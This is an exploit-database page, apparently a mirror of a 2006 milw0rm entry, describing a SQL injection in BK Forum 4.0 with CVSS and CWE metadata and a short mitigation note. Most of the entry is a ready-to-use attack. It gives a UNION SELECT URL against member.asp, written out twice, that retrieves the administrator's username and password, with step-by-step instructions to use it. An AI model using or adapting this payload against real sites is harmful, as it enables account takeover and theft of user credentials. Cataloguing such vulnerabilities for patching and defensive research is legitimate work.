header-logo
Suggest Exploit
vendor:
BK Forum
by:
n0m3rcy
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BK Forum
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE: N/A
CPE: a:bk_forum:bk_forum:4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

BK Forum <= 4.0 Remote SQL Injection

First you must be logged in. Then type this in your browser: http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1. You will find admin's password.

Mitigation:

Input validation and sanitization, use of parameterized queries, and use of stored procedures.
Source

Exploit-DB raw data:

# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit:

First you must be logged in
Then type this in your browser

http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1

You will find admin's password

# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00

# Have phun!

# milw0rm.com [2006-04-24]

Navigation

Suggest Exploit

Services By CQR